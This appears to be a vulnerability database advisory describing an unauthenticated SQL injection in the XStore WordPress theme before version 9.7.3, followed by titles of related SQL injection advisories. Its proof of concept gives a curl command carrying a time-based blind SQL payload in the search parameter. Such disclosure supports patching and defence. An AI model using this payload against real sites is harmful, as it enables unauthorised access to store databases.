XStore < 9.7.3 – Unauthenticated SQLi | CVE 2026-3326 | Theme Vulnerabilities

Description

The theme does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

Proof of Concept

Have the following installed:
1. Xstore Theme (the vulnerable)
2. Xstore Core Plugin
3. Woocommerce Plugin

then run the following command:

`curl "https://example.com/?s=test%27)%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20(%27hyMm%27=%27hyMm&et_search=true&post_type=product"
`

Observable Result: Response time of ~11 seconds or more.

Affects Themes

Fixed in 9.7.3

References

CVE

URL

https://themeforest.net/item/xstore-responsive-woocommerce-theme/15780546

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Ahmed Makawi

Submitter

Ahmed Makawi

Submitter website

https://www.linkedin.com/in/ahmed-makawi/

Verified

Yes

WPVDB ID

2c5bdb17-8b12-45b5-878b-627056dc8956

Timeline

Publicly Published

2026-05-20 (about 1 month ago)

Added

2026-05-20 (about 1 month ago)

Last Updated

2026-06-29 (about 12 hours ago)

Other

Published

Title

Published

2025-03-03

Title

Multiple Shipping And Billing Address For Woocommerce < 1.5 - Unauthenticated SQL Injection

Published

2014-08-01

Title

Dynamic Font Replacement 1.3 - SQL Injection

Published

2026-03-04

Title

Page and Post Clone < 6.4 - Authenticated (Contributor+) SQL Injection via 'meta_key' Parameter

Published

2024-10-31

Title

SIP Reviews Shortcode for WooCommerce <= 1.2.3 - Authenticated (Contributor+) SQL Injection

Published

2024-09-25

Title

Classic Editor and Classic Widgets < 1.4.2 - Authenticated (Subscriber+) SQL Injection